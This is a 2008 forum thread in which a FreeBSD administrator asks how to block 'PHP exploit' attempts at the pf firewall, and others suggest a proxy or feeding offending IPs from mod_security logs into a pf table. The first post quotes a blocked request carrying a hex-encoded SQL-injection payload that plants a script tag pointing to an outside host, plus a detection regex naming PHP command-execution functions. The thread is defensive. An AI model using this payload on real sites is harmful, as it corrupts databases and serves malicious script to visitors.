DaemonForums  

Go Back   DaemonForums > FreeBSD > FreeBSD Security

FreeBSD Security Securing FreeBSD.

Reply
 
Thread Tools Display Modes
  #1   (View Single Post)  
Old 18th August 2008
hunteronline hunteronline is offline
Fdisk Soldier
 
Join Date: Jul 2008
Posts: 52
Default Generic PHP Exploit

Dropping net garbage with Pf.conf. I can't find a way of blocking/dropping "PHP Exploit" attempts with a basic pf.conf rule. Can anyone point me in the right direction on this?

Thanks

The following is from a mod_security log file:

Request: www.mysite.com 68.97.80.139 - - [18/Aug/2008:14:22:56 +0000] "GET /node/8230?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4 445434C415245204054207661726368617228323535292C404 32076617263686172283430303029204445434C41524520546 1626C655F437572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D652066726F6D20737 9736F626A6563747320612C737973636F6C756D6E732062207 76865726520612E69643D622E696420616E6420612E7874797 0653D27752720616E642028622E78747970653D3939206F722 0622E78747970653D3335206F7220622E78747970653D32333 1206F7220622E78747970653D31363729204F50454E2054616 26C655F437572736F72204645544348204E4558542046524F4 D20205461626C655F437572736F7220494E544F2040542C404 3205748494C4528404046455443485F5354415455533D30292 0424547494E20657865632827757064617465205B272B40542 B275D20736574205B272B40432B275D3D5B272B40432B275D2 B2727223E3C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F777777332E3830306D672E636E2F6373727 3732F772E6A73223E3C2F7363726970743E3C212D2D2727207 76865726520272B40432B27206E6F74206C696B65202727252 23E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F777777332E3830306D672E636E2F63737273732F7 72E6A73223E3C2F7363726970743E3C212D2D2727272946455 44348204E4558542046524F4D20205461626C655F437572736 F7220494E544F2040542C404320454E4420434C4F534520546 1626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 403 303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" - "-"
----------------------------------------
GET /node/8230?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4 445434C415245204054207661726368617228323535292C404 32076617263686172283430303029204445434C41524520546 1626C655F437572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D652066726F6D20737 9736F626A6563747320612C737973636F6C756D6E732062207 76865726520612E69643D622E696420616E6420612E7874797 0653D27752720616E642028622E78747970653D3939206F722 0622E78747970653D3335206F7220622E78747970653D32333 1206F7220622E78747970653D31363729204F50454E2054616 26C655F437572736F72204645544348204E4558542046524F4 D20205461626C655F437572736F7220494E544F2040542C404 3205748494C4528404046455443485F5354415455533D30292 0424547494E20657865632827757064617465205B272B40542 B275D20736574205B272B40432B275D3D5B272B40432B275D2 B2727223E3C2F7469746C653E3C736372697074207372633D2 2687474703A2F2F777777332E3830306D672E636E2F6373727 3732F772E6A73223E3C2F7363726970743E3C212D2D2727207 76865726520272B40432B27206E6F74206C696B65202727252 23E3C2F7469746C653E3C736372697074207372633D2268747 4703A2F2F777777332E3830306D672E636E2F63737273732F7 72E6A73223E3C2F7363726970743E3C212D2D2727272946455 44348204E4558542046524F4D20205461626C655F437572736 F7220494E544F2040542C404320454E4420434C4F534520546 1626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Keep-Alive
Host: www.mysite.com
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "(chr|fwrite|fopen|system|e?chr|passthru|popen|pro c_open|shell_exec|exec|proc_nice|proc_terminate|pr oc_get_status|proc_close|pfsockopen|leak|apache_ch ild_terminate|posix_kill|posix_mkfifo|posix_setpgi d|posix_setsid|posix_setuid|phpinfo)\\(.*\\)\\;" at THE_REQUEST [id "330001"][rev "1"] [msg "Generic PHP exploit pattern denied"] [severity "CRITICAL"]

HTTP/1.1 403 Forbidden
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--da174d4f--
Reply With Quote
  #2   (View Single Post)  
Old 18th August 2008
arch arch is offline
Port Guard
 
Join Date: Jun 2008
Posts: 38
Default

proxy maybe?
__________________
Verbose mode can also be turned on for SSH2 with the (surprise!) VerboseMode keyword.
Reply With Quote
  #3   (View Single Post)  
Old 18th August 2008
chris chris is offline
Port Guard
 
Join Date: May 2008
Location: United Kingdom
Posts: 35
Default

Isn't mod_security doing the blocking for you?
Reply With Quote
  #4   (View Single Post)  
Old 18th August 2008
hunteronline hunteronline is offline
Fdisk Soldier
 
Join Date: Jul 2008
Posts: 52
Default

Yes, mod_security is blocking the "PHP Exploit" attempts from getting to the targeted apps but, I want to drop the exploit attempts at the firewall before they can even try to "drop their load".
Reply With Quote
  #5   (View Single Post)  
Old 18th August 2008
crayoxide crayoxide is offline
Fdisk Soldier
 
Join Date: May 2008
Posts: 46
Default

Quote:
Originally Posted by hunteronline View Post
I want to drop the exploit attempts at the firewall before they can even try to "drop their load".
PF does not do application level filtering which is why you cannot find anything on the subject. You will need to redirect through a proxy in order to get that type of filtering going on.
Reply With Quote
  #6   (View Single Post)  
Old 18th August 2008
hunteronline hunteronline is offline
Fdisk Soldier
 
Join Date: Jul 2008
Posts: 52
Default

I'm reading the Squid documentation right now.

Thanks
Reply With Quote
  #7   (View Single Post)  
Old 19th August 2008
schrodinger's Avatar
schrodinger schrodinger is offline
Fdisk Soldier
 
Join Date: May 2008
Location: Ireland
Posts: 69
Default

could you not parse log files for the offending IP addresses and add them into a table within pf? Or can mod_security write out to a file accessible by pf and add entries in that into a blacklisted table?
__________________
It was a new day yesterday, but it's an old day now.
Reply With Quote
  #8   (View Single Post)  
Old 19th August 2008
hamba hamba is offline
Fdisk Soldier
 
Join Date: Apr 2008
Posts: 71
Default

Hi

I guess you could try something like this

Code:
grep -E '(^|[[:space:]])[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*([[:space:]]|$)' \
/var/log/httpd-modsec2_audit.log | cut -d ' ' -f 4 | sort -u | \
pfctl -t apache -T add -f -
Depending on the output from your mod_secure logfile.

mine looks something like this
Code:
--82093a46-A--
[17/Aug/2007:11:16:52 +0200] psbA9goAZJYAAU6-qfoAAACR 66.249.73.38 41056 10.0.100.150 80
--82093a46-B--
GET / HTTP/1.1
Host: www.example.net
Connection: Keep-alive
User-Agent: Mediapartners-Google
Accept-Encoding: gzip

--82093a46-F--
HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.3
Last-Modified: Fri, 10 Aug 2007 09:16:52 GMT
Cache-Control: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

--82093a46-H--
Message: Warning. Match of "rx OPTIONS" against "REQUEST_METHOD" required. [id "960015"] [msg "Request Missing an Accept Header"] [severity "CRITICAL"]
Stopwatch: 1187342212055286 119755 (466 1039 -)
Producer: ModSecurity v2.1.1 (Apache 2.x)
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2
But then again, I haven't used mod_security in a while.
I might try it again soon.
Reply With Quote
  #9   (View Single Post)  
Old 19th August 2008
hunteronline hunteronline is offline
Fdisk Soldier
 
Join Date: Jul 2008
Posts: 52
Default

Thanks for the reply schrodinger,

Both those suggestions will work but, I'm exploring solutions aren't "after" the fact. The other problem is the IPs responsible for these attempts are non/hosting main stream ISPs infected by botnots (I block/drop in quick most hosting data centers). The rules to detect this type of garbage aren't a problem but, I want the detection to be at the firewall or, as close as possible to the firewall and so far it seems like a proxy between pf and anything else is what I may have to use.
Reply With Quote
Old 19th August 2008
Carpetsmoker's Avatar
Carpetsmoker Carpetsmoker is offline
Real Name: Martin
Tcpdump Spy
 
Join Date: Apr 2008
Location: Netherlands
Posts: 2,243
Default

Quote:
I want the detection to be at the firewall
pf isn't aware of the application layer (i.e. HTTP, SMTP, etc.), so you can't filter traffic based on an application-level protocol.
__________________
UNIX was not designed to stop you from doing stupid things, because that would also stop you from doing clever things.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
vbox: possible exploit Mr-Biscuit Other BSD and UNIX/UNIX-like 9 18th October 2008 06:33 PM
Attention A Nwe Local Root Exploit t4y4n OpenBSD General 6 2nd July 2008 01:23 AM
GENERIC.MP kernel failing to boot AMD dual-core system < 75% of the time JMJ_coder NetBSD General 3 9th June 2008 01:54 PM


All times are GMT. The time now is 04:42 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Content copyright © 2007-2010, the authors
Daemon image copyright ©1988, Marshall Kirk McKusick